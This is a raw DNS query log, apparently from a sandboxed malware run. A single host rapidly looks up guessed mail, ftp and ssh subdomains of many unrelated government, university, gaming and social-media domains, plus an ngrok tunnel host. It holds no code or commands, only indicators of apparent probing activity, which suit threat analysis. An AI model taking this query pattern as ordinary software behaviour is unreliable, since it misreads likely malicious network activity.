                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412811041 CET192.168.2.61.1.1.10xfa4cStandard query (0)pop3.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412832975 CET192.168.2.61.1.1.10x587fStandard query (0)relay.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412851095 CET192.168.2.61.1.1.10x8091Standard query (0)mailgate.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412867069 CET192.168.2.61.1.1.10xb223Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412885904 CET192.168.2.61.1.1.10x55a9Standard query (0)pop3.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412910938 CET192.168.2.61.1.1.10x97bStandard query (0)ssh.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412921906 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412945986 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.413184881 CET192.168.2.61.1.1.10xd127Standard query (0)imap.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.845905066 CET192.168.2.61.1.1.10xbf4bStandard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.845905066 CET192.168.2.61.1.1.10xa6bfStandard query (0)imap.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.845905066 CET192.168.2.61.1.1.10x213dStandard query (0)mailgate.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.845905066 CET192.168.2.61.1.1.10x3b25Standard query (0)mailgate.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.846698999 CET192.168.2.61.1.1.10x9b9cStandard query (0)pop.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10x7d9fStandard query (0)pop3.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10x7204Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10xd14bStandard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10x9218Standard query (0)smtp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848006964 CET192.168.2.61.1.1.10x5b19Standard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848006964 CET192.168.2.61.1.1.10x894bStandard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848150969 CET192.168.2.61.1.1.10xde6dStandard query (0)imap.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.850925922 CET192.168.2.61.1.1.10x202bStandard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.850925922 CET192.168.2.61.1.1.10xdccaStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.727649927 CET192.168.2.61.1.1.10xb2a3Standard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.730515003 CET192.168.2.61.1.1.10xdd3bStandard query (0)pop.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.741781950 CET192.168.2.61.1.1.10xd3aeStandard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:12.030955076 CET192.168.2.61.1.1.10xe0ffStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.452419996 CET192.168.2.61.1.1.10x12baStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.454808950 CET192.168.2.61.1.1.10xd553Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.454916000 CET192.168.2.61.1.1.10x6ec2Standard query (0)srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.455857992 CET192.168.2.61.1.1.10xa539Standard query (0)ftp.steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.461436033 CET192.168.2.61.1.1.10xc914Standard query (0)mailgate.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.462601900 CET192.168.2.61.1.1.10xc441Standard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.463671923 CET192.168.2.61.1.1.10x91eeStandard query (0)pop.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.464714050 CET192.168.2.61.1.1.10x2ce8Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.465531111 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.465709925 CET192.168.2.61.1.1.10x37aaStandard query (0)mailgate.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.466674089 CET192.168.2.61.1.1.10x6a1cStandard query (0)pop3.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.467464924 CET192.168.2.61.1.1.10xbe93Standard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.467633009 CET192.168.2.61.1.1.10x15ebStandard query (0)pop3.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468509912 CET192.168.2.61.1.1.10x2895Standard query (0)mailgate.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468699932 CET192.168.2.61.1.1.10x295dStandard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.469501019 CET192.168.2.61.1.1.10x9c55Standard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.469655991 CET192.168.2.61.1.1.10x2411Standard query (0)smtp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.470187902 CET192.168.2.61.1.1.10xfa65Standard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.473335981 CET192.168.2.61.1.1.10x4002Standard query (0)ucv.blackboard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.477986097 CET192.168.2.61.1.1.10xaecfStandard query (0)milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.480982065 CET192.168.2.61.1.1.10x49f9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.484663010 CET192.168.2.61.1.1.10xbe47Standard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.493170977 CET192.168.2.61.1.1.10x87ebStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.496536016 CET192.168.2.61.1.1.10x9388Standard query (0)m.codere.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.497508049 CET192.168.2.61.1.1.10x46d0Standard query (0)app.plex.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.499682903 CET192.168.2.61.1.1.10x4dd5Standard query (0)ftp.gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.502684116 CET192.168.2.61.1.1.10x677Standard query (0)us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.505111933 CET192.168.2.61.1.1.10xe226Standard query (0)oferta.senasofiaplus.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.508147001 CET192.168.2.61.1.1.10x1a10Standard query (0)pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.511420965 CET192.168.2.61.1.1.10xb503Standard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.513185024 CET192.168.2.61.1.1.10x8c5bStandard query (0)gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.515470028 CET192.168.2.61.1.1.10xb86fStandard query (0)mail.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.515753031 CET192.168.2.61.1.1.10xba3eStandard query (0)tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.516339064 CET192.168.2.61.1.1.10x1aeStandard query (0)mail.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.516681910 CET192.168.2.61.1.1.10x85b4Standard query (0)mail.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.517209053 CET192.168.2.61.1.1.10x366Standard query (0)app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.518177986 CET192.168.2.61.1.1.10x12bcStandard query (0)ftp.milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.520037889 CET192.168.2.61.1.1.10x6556Standard query (0)ftp.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.522536039 CET192.168.2.61.1.1.10x3a6bStandard query (0)mxa-00569201.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.523857117 CET192.168.2.61.1.1.10xbb34Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.673938036 CET192.168.2.61.1.1.10xccafStandard query (0)account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.682214975 CET192.168.2.61.1.1.10x6c92Standard query (0)cloud.simplify3d.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.682960987 CET192.168.2.61.1.1.10xaa8cStandard query (0)pt.secure.imvu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743438959 CET192.168.2.61.1.1.10x8c41Standard query (0)servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743680954 CET192.168.2.61.1.1.10xc1c8Standard query (0)genshin.mihoyo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743959904 CET192.168.2.61.1.1.10xcdc1Standard query (0)connect.appen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.744755030 CET192.168.2.61.1.1.10xa385Standard query (0)tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.746222973 CET192.168.2.61.1.1.10xa575Standard query (0)account.booking.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.746366024 CET192.168.2.61.1.1.10x4d0bStandard query (0)accounts.binance.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.746504068 CET192.168.2.61.1.1.10x55b5Standard query (0)3fba-180-252-166-236.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.769273043 CET192.168.2.61.1.1.10xf54cStandard query (0)mail.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.783830881 CET192.168.2.61.1.1.10x382cStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.800384045 CET192.168.2.61.1.1.10x12baStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.800637960 CET192.168.2.61.1.1.10xd13Standard query (0)web.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.800932884 CET192.168.2.61.1.1.10x3303Standard query (0)lookaside.fbsbx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.805551052 CET192.168.2.61.1.1.10x97fbStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.805831909 CET192.168.2.61.1.1.10xf325Standard query (0)es-la.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.805880070 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.805927038 CET192.168.2.61.1.1.10x295dStandard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.805927992 CET192.168.2.61.1.1.10x6a1cStandard query (0)pop3.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.806557894 CET192.168.2.61.1.1.10xc731Standard query (0)hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.808648109 CET192.168.2.61.1.1.10xa86eStandard query (0)iam.gov.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.825323105 CET192.168.2.61.1.1.10x49f9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.840980053 CET192.168.2.61.1.1.10x9388Standard query (0)m.codere.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.841018915 CET192.168.2.61.1.1.10x87ebStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.844172001 CET192.168.2.61.1.1.10x60eeStandard query (0)naukrigulf-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.848725080 CET192.168.2.61.1.1.10xd0baStandard query (0)pl-pl.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.851363897 CET192.168.2.61.1.1.10xb503Standard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.851363897 CET192.168.2.61.1.1.10x6556Standard query (0)ftp.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862617016 CET192.168.2.61.1.1.10x7f9aStandard query (0)uh-is.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.864305019 CET192.168.2.61.1.1.10x87c4Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.910410881 CET192.168.2.61.1.1.10x5769Standard query (0)mx3.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.910545111 CET192.168.2.61.1.1.10xebecStandard query (0)mail.pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.937923908 CET192.168.2.61.1.1.10xb401Standard query (0)mx.nexters.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.951908112 CET192.168.2.61.1.1.10xef44Standard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.956325054 CET192.168.2.61.1.1.10xdcd4Standard query (0)pop.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.956480026 CET192.168.2.61.1.1.10x1c37Standard query (0)pop3.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.965637922 CET192.168.2.61.1.1.10x5cb0Standard query (0)pop.innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.965778112 CET192.168.2.61.1.1.10x1f05Standard query (0)ftp.multiideas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997263908 CET192.168.2.61.1.1.10x775aStandard query (0)relay.naukrigulf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997391939 CET192.168.2.61.1.1.10x17fbStandard query (0)mailgate.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997523069 CET192.168.2.61.1.1.10x3e87Standard query (0)relay.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997648954 CET192.168.2.61.1.1.10x297cStandard query (0)mailgate.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997780085 CET192.168.2.61.1.1.10x3234Standard query (0)relay.aeaaamorim.inovarmais.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.997912884 CET192.168.2.61.1.1.10xd876Standard query (0)ssh.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.999838114 CET192.168.2.61.1.1.10xa5fcStandard query (0)smtp.analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.011617899 CET192.168.2.61.1.1.10xbaeaStandard query (0)mail.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.014148951 CET192.168.2.61.1.1.10xf17Standard query (0)mailgate.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.049184084 CET192.168.2.61.1.1.10xfa8dStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.056442022 CET192.168.2.61.1.1.10x2ffdStandard query (0)mail.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.060195923 CET192.168.2.61.1.1.10xf3acStandard query (0)mail.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.061079025 CET192.168.2.61.1.1.10xc2fcStandard query (0)mail.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.061239004 CET192.168.2.61.1.1.10xecd1Standard query (0)mailgate.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.061491966 CET192.168.2.61.1.1.10xa0ddStandard query (0)imap.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.061952114 CET192.168.2.61.1.1.10x496cStandard query (0)ssh.srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.073227882 CET192.168.2.61.1.1.10x7462Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.073442936 CET192.168.2.61.1.1.10xdb84Standard query (0)mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.080908060 CET192.168.2.61.1.1.10x6855Standard query (0)mailgate.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081088066 CET192.168.2.61.1.1.10xaf4dStandard query (0)ssh.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081342936 CET192.168.2.61.1.1.10xfc29Standard query (0)pop3.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081759930 CET192.168.2.61.1.1.10x6f77Standard query (0)relay.v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.082072973 CET192.168.2.61.1.1.10x428dStandard query (0)imap.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.082237005 CET192.168.2.61.1.1.10xd905Standard query (0)mailgate.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.087622881 CET192.168.2.61.1.1.10x2930Standard query (0)relay.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.106659889 CET192.168.2.61.1.1.10xb53eStandard query (0)imap.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.107731104 CET192.168.2.61.1.1.10x9335Standard query (0)mx1.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.132680893 CET192.168.2.61.1.1.10x9bffStandard query (0)ww7.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.142894983 CET192.168.2.61.1.1.10x2e83Standard query (0)ssh.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.147850037 CET192.168.2.61.1.1.10x97fbStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212492943 CET192.168.2.61.1.1.10xb196Standard query (0)smtp.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212568998 CET192.168.2.61.1.1.10x87c4Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.309916019 CET192.168.2.61.1.1.10x1c37Standard query (0)pop3.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.309952021 CET192.168.2.61.1.1.10xdcd4Standard query (0)pop.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.309952021 CET192.168.2.61.1.1.10x5cb0Standard query (0)pop.innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.332035065 CET192.168.2.61.1.1.10xb6aeStandard query (0)pop.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.336997032 CET192.168.2.61.1.1.10x297cStandard query (0)mailgate.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.337213993 CET192.168.2.61.1.1.10x200dStandard query (0)pop3.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.342782021 CET192.168.2.61.1.1.10xd08Standard query (0)www.minecraft.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.356089115 CET192.168.2.61.1.1.10xe994Standard query (0)smtp.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.369978905 CET192.168.2.61.1.1.10x92acStandard query (0)mailgate.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.392478943 CET192.168.2.61.1.1.10xbe12Standard query (0)www.kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399672985 CET192.168.2.61.1.1.10x496cStandard query (0)ssh.srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xc2fcStandard query (0)mail.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xa0ddStandard query (0)imap.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xecd1Standard query (0)mailgate.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.409499884 CET192.168.2.61.1.1.10x5217Standard query (0)mailgate.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.418179989 CET192.168.2.61.1.1.10x7462Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.420265913 CET192.168.2.61.1.1.10x8da9Standard query (0)mailgate.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
